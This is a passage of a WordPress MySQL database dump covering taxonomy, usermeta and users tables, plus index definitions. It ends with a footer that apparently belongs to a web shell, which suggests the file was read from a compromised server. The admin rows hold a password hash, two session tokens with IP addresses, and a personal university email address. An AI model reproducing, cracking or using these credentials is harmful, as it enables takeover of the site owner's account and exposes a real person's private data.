) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_term_relationships`
--

INSERT INTO `wp_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES
(1, 1, 0),
(17, 1, 0),
(26, 15, 0),
(27, 15, 0),
(28, 15, 0),
(29, 15, 0),
(30, 15, 0),
(31, 15, 0),
(32, 15, 0),
(33, 15, 0),
(34, 15, 0),
(35, 15, 0),
(38, 15, 0),
(40, 7, 0),
(47, 16, 0),
(62, 7, 0),
(65, 1, 0),
(82, 1, 0),
(86, 11, 0),
(89, 11, 0),
(93, 18, 0),
(103, 8, 0),
(105, 8, 0),
(107, 8, 0),
(109, 8, 0),
(111, 8, 0),
(113, 8, 0),
(115, 8, 0),
(117, 8, 0),
(119, 8, 0),
(121, 8, 0),
(123, 8, 0),
(125, 8, 0),
(127, 8, 0),
(129, 8, 0),
(131, 8, 0),
(133, 8, 0),
(135, 8, 0),
(137, 8, 0),
(139, 8, 0),
(141, 8, 0),
(143, 8, 0),
(145, 8, 0),
(147, 8, 0),
(149, 8, 0),
(151, 8, 0),
(153, 8, 0),
(155, 8, 0),
(157, 8, 0),
(159, 8, 0),
(161, 8, 0),
(163, 8, 0),
(165, 8, 0),
(167, 8, 0),
(169, 8, 0),
(171, 8, 0),
(173, 8, 0),
(175, 8, 0),
(177, 8, 0),
(179, 8, 0),
(181, 8, 0),
(183, 8, 0),
(185, 8, 0),
(187, 8, 0),
(189, 8, 0),
(191, 8, 0),
(193, 8, 0),
(195, 8, 0),
(197, 8, 0),
(199, 8, 0),
(201, 8, 0),
(203, 8, 0),
(205, 8, 0),
(207, 8, 0),
(209, 8, 0),
(211, 8, 0),
(213, 8, 0),
(215, 8, 0),
(217, 8, 0),
(219, 8, 0),
(221, 8, 0),
(223, 8, 0),
(225, 8, 0),
(227, 8, 0),
(229, 8, 0),
(231, 8, 0),
(233, 8, 0),
(235, 8, 0),
(237, 8, 0),
(239, 8, 0),
(241, 8, 0),
(243, 8, 0),
(245, 8, 0),
(247, 8, 0),
(249, 8, 0),
(251, 8, 0),
(253, 8, 0),
(255, 8, 0),
(257, 8, 0),
(259, 8, 0),
(261, 8, 0),
(263, 8, 0),
(265, 8, 0),
(267, 8, 0),
(270, 8, 0),
(272, 8, 0),
(274, 8, 0),
(276, 8, 0),
(278, 8, 0),
(280, 8, 0),
(282, 8, 0),
(284, 8, 0),
(286, 8, 0),
(288, 8, 0),
(290, 8, 0),
(292, 8, 0),
(294, 8, 0),
(296, 8, 0),
(298, 8, 0),
(300, 8, 0),
(302, 8, 0),
(304, 8, 0),
(306, 8, 0),
(308, 8, 0),
(310, 8, 0),
(312, 8, 0),
(314, 8, 0),
(316, 8, 0),
(318, 8, 0),
(320, 8, 0),
(322, 8, 0),
(324, 8, 0),
(326, 8, 0),
(328, 8, 0),
(330, 8, 0),
(332, 8, 0),
(334, 8, 0),
(336, 8, 0),
(338, 8, 0),
(340, 8, 0),
(342, 8, 0),
(344, 8, 0),
(346, 8, 0),
(348, 8, 0),
(350, 8, 0),
(352, 8, 0),
(354, 8, 0),
(356, 8, 0),
(358, 8, 0),
(360, 8, 0),
(362, 8, 0),
(364, 8, 0),
(366, 8, 0),
(368, 8, 0),
(370, 8, 0),
(372, 8, 0),
(374, 8, 0),
(376, 8, 0),
(378, 8, 0),
(380, 8, 0),
(382, 8, 0),
(384, 8, 0),
(386, 8, 0),
(388, 8, 0),
(390, 8, 0),
(392, 8, 0),
(394, 8, 0),
(396, 8, 0),
(398, 8, 0),
(400, 8, 0),
(402, 8, 0),
(404, 8, 0),
(406, 8, 0),
(408, 8, 0),
(410, 8, 0),
(412, 8, 0),
(414, 8, 0),
(416, 8, 0),
(418, 8, 0),
(420, 8, 0),
(422, 8, 0),
(424, 8, 0),
(426, 8, 0),
(428, 8, 0),
(430, 8, 0),
(432, 8, 0),
(434, 8, 0),
(436, 8, 0),
(438, 8, 0),
(440, 8, 0),
(442, 8, 0),
(444, 8, 0),
(446, 8, 0),
(448, 8, 0),
(450, 8, 0),
(452, 8, 0),
(454, 8, 0),
(456, 8, 0),
(458, 8, 0),
(460, 8, 0),
(462, 8, 0),
(464, 8, 0),
(466, 8, 0),
(468, 8, 0),
(470, 8, 0),
(482, 9, 0),
(484, 9, 0),
(486, 9, 0),
(488, 9, 0),
(490, 9, 0),
(492, 9, 0),
(494, 9, 0),
(496, 9, 0),
(498, 9, 0),
(500, 9, 0),
(502, 9, 0),
(504, 9, 0),
(506, 9, 0),
(508, 9, 0),
(510, 9, 0),
(512, 9, 0),
(514, 10, 0),
(516, 10, 0),
(518, 10, 0),
(520, 10, 0),
(522, 10, 0),
(524, 10, 0),
(526, 10, 0),
(528, 10, 0),
(530, 10, 0),
(532, 10, 0),
(534, 10, 0),
(536, 10, 0),
(538, 10, 0),
(540, 10, 0),
(542, 10, 0),
(544, 10, 0),
(546, 10, 0),
(551, 7, 0),
(553, 7, 0),
(555, 7, 0),
(557, 7, 0),
(559, 7, 0),
(561, 7, 0),
(563, 7, 0),
(565, 7, 0),
(567, 7, 0),
(569, 7, 0),
(571, 7, 0),
(573, 7, 0),
(575, 7, 0),
(577, 7, 0),
(579, 7, 0),
(581, 7, 0),
(583, 7, 0),
(585, 7, 0),
(587, 7, 0),
(589, 7, 0),
(591, 7, 0),
(593, 7, 0),
(595, 7, 0),
(597, 7, 0),
(599, 7, 0),
(601, 7, 0),
(607, 15, 0),
(611, 15, 0),
(614, 15, 0),
(615, 11, 0),
(618, 11, 0),
(624, 11, 0),
(628, 11, 0),
(630, 11, 0),
(633, 11, 0),
(635, 11, 0),
(637, 11, 0),
(639, 11, 0),
(641, 11, 0),
(643, 11, 0),
(645, 14, 0);

-- --------------------------------------------------------

--
-- Table structure for table `wp_term_taxonomy`
--

CREATE TABLE IF NOT EXISTS `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8_general_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=InnoDB AUTO_INCREMENT=20 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_term_taxonomy`
--

INSERT INTO `wp_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES
(1, 1, 'category', '', 0, 1),
(5, 5, 'category', '', 0, 0),
(6, 6, 'category', '', 0, 0),
(7, 7, 'category', '', 0, 26),
(8, 8, 'category', '', 0, 184),
(9, 9, 'category', '', 0, 15),
(10, 10, 'category', '', 0, 17),
(11, 11, 'category', '', 0, 11),
(12, 12, 'category', '', 0, 0),
(13, 13, 'category', '', 0, 0),
(14, 14, 'category', '', 0, 1),
(15, 15, 'nav_menu', '', 0, 14),
(16, 16, 'nav_menu', '', 0, 1),
(17, 17, 'post_format', '', 0, 0),
(18, 18, 'nav_menu', '', 0, 1),
(19, 19, 'category', '', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `wp_usermeta`
--

CREATE TABLE IF NOT EXISTS `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8_general_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8_general_ci
) ENGINE=InnoDB AUTO_INCREMENT=31 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_usermeta`
--

INSERT INTO `wp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(1, 1, 'nickname', 'admin'),
(2, 1, 'first_name', ''),
(3, 1, 'last_name', ''),
(4, 1, 'description', ''),
(5, 1, 'rich_editing', 'true'),
(6, 1, 'syntax_highlighting', 'true'),
(7, 1, 'comment_shortcuts', 'false'),
(8, 1, 'admin_color', 'fresh'),
(9, 1, 'use_ssl', '0'),
(10, 1, 'show_admin_bar_front', 'true'),
(11, 1, 'locale', 'en_US'),
(12, 1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'),
(13, 1, 'wp_user_level', '10'),
(14, 1, 'dismissed_wp_pointers', 'wp496_privacy,theme_editor_notice'),
(15, 1, 'show_welcome_panel', '1'),
(17, 1, 'wp_dashboard_quick_press_last_post_id', '4'),
(18, 1, 'community-events-location', 'a:1:{s:2:"ip";s:12:"172.17.166.0";}'),
(19, 1, 'wp_user-settings', 'hidetb=1&libraryContent=browse&editor=tinymce&advImgDetails=show&widgets_access=off&editor_plain_text_paste_warning=2'),
(20, 1, 'wp_user-settings-time', '1558922970'),
(21, 1, 'managenav-menuscolumnshidden', 'a:5:{i:0;s:11:"link-target";i:1;s:11:"css-classes";i:2;s:3:"xfn";i:3;s:11:"description";i:4;s:15:"title-attribute";}'),
(22, 1, 'metaboxhidden_nav-menus', 'a:2:{i:0;s:12:"add-post_tag";i:1;s:15:"add-post_format";}'),
(23, 1, 'nav_menu_recently_edited', '15'),
(25, 1, 'closedpostboxes_post', 'a:0:{}'),
(26, 1, 'metaboxhidden_post', 'a:6:{i:0;s:11:"postexcerpt";i:1;s:13:"trackbacksdiv";i:2;s:10:"postcustom";i:3;s:16:"commentstatusdiv";i:4;s:7:"slugdiv";i:5;s:9:"authordiv";}'),
(28, 1, 'session_tokens', 'a:2:{s:64:"6465de16a97dc84b82360e7d1a5223902b0d448ee57169be1d40b84d94022ba2";a:4:{s:10:"expiration";i:1559092976;s:2:"ip";s:14:"172.17.217.214";s:2:"ua";s:78:"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0";s:5:"login";i:1558920176;}s:64:"f56a424b89c8953e7687fde193f4ba37eb252092784bb785886f2627e1acc2da";a:4:{s:10:"expiration";i:1559100824;s:2:"ip";s:14:"172.17.166.156";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36";s:5:"login";i:1558928024;}}'),
(29, 1, 'closedpostboxes_page', 'a:0:{}'),
(30, 1, 'metaboxhidden_page', 'a:5:{i:0;s:10:"postcustom";i:1;s:16:"commentstatusdiv";i:2;s:11:"commentsdiv";i:3;s:7:"slugdiv";i:4;s:9:"authordiv";}');

-- --------------------------------------------------------

--
-- Table structure for table `wp_users`
--

CREATE TABLE IF NOT EXISTS `wp_users` (
  `ID` bigint(20) unsigned NOT NULL,
  `user_login` varchar(60) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8_general_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8_general_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `wp_users`
--

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'admin', '$P$BxPqufyjk.WvXAwi6GUHWmy.3IDiDr/', 'admin', 'kobsak.na@skru.ac.th', '', '2019-05-26 01:45:00', '', 0, 'admin');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `wp_commentmeta`
--
ALTER TABLE `wp_commentmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `comment_id` (`comment_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Indexes for table `wp_comments`
--
ALTER TABLE `wp_comments`
  ADD PRIMARY KEY (`comment_ID`),
  ADD KEY `comment_post_ID` (`comment_post_ID`),
  ADD KEY `comment_approved_date_gmt` (`comment_approved`,`comment_date_gmt`),
  ADD KEY `comment_date_gmt` (`comment_date_gmt`),
  ADD KEY `comment_parent` (`comment_parent`),
  ADD KEY `comment_author_email` (`comment_author_email`(10));

--
-- Indexes for table `wp_links`
--
ALTER TABLE `wp_links`
  ADD PRIMARY KEY (`link_id`),
  ADD KEY `link_visible` (`link_visible`);

--
-- Indexes for table `wp_options`
--
ALTER TABLE `wp_options`
  ADD PRIMARY KEY (`option_id`),
  ADD UNIQUE KEY `option_name` (`option_name`);

--
-- Indexes for table `wp_postmeta`
--
ALTER TABLE `wp_postmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `post_id` (`post_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Indexes for table `wp_posts`
--
ALTER TABLE `wp_posts`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `post_name` (`post_name`(191)),
  ADD KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  ADD KEY `post_parent` (`post_parent`),
  ADD KEY `post_author` (`post_author`);

--
-- Indexes for table `wp_termmeta`
--
ALTER TABLE `wp_termmeta`
  ADD PRIMARY KEY (`meta_id`),
  ADD KEY `term_id` (`term_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Indexes for table `wp_terms`
--
ALTER TABLE `wp_terms`
  ADD PRIMARY KEY (`term_id`),
  ADD KEY `slug` (`slug`(191)),
  ADD KEY `name` (`name`(191));

--
-- Indexes for table `wp_term_relationships`
--
ALTER TABLE `wp_term_relationships`
  ADD PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  ADD KEY `term_taxonomy_id` (`term_taxonomy_id`);

--
-- Indexes for table `wp_term_taxonomy`
--
ALTER TABLE `wp_term_taxonomy`
  ADD PRIMARY KEY (`term_taxonomy_id`),
  ADD UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  ADD KEY `taxonomy` (`taxonomy`);

--
-- Indexes for table `wp_usermeta`
--
ALTER TABLE `wp_usermeta`
  ADD PRIMARY KEY (`umeta_id`),
  ADD KEY `user_id` (`user_id`),
  ADD KEY `meta_key` (`meta_key`(191));

--
-- Indexes for table `wp_users`
--
ALTER TABLE `wp_users`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `user_login_key` (`user_login`),
  ADD KEY `user_nicename` (`user_nicename`),
  ADD KEY `user_email` (`user_email`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `wp_commentmeta`
--
ALTER TABLE `wp_commentmeta`
  MODIFY `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `wp_comments`
--
ALTER TABLE `wp_comments`
  MODIFY `comment_ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `wp_links`
--
ALTER TABLE `wp_links`
  MODIFY `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `wp_options`
--
ALTER TABLE `wp_options`
  MODIFY `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=929;
--
-- AUTO_INCREMENT for table `wp_postmeta`
--
ALTER TABLE `wp_postmeta`
  MODIFY `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=1584;
--
-- AUTO_INCREMENT for table `wp_posts`
--
ALTER TABLE `wp_posts`
  MODIFY `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=651;
--
-- AUTO_INCREMENT for table `wp_termmeta`
--
ALTER TABLE `wp_termmeta`
  MODIFY `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT for table `wp_terms`
--
ALTER TABLE `wp_terms`
  MODIFY `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=20;
--
-- AUTO_INCREMENT for table `wp_term_taxonomy`
--
ALTER TABLE `wp_term_taxonomy`
  MODIFY `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=20;
--
-- AUTO_INCREMENT for table `wp_usermeta`
--
ALTER TABLE `wp_usermeta`
  MODIFY `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=31;
--
-- AUTO_INCREMENT for table `wp_users`
--
ALTER TABLE `wp_users`
  MODIFY `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=2;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

Youez - 2016 - github.com/yon3zu
LinuXploit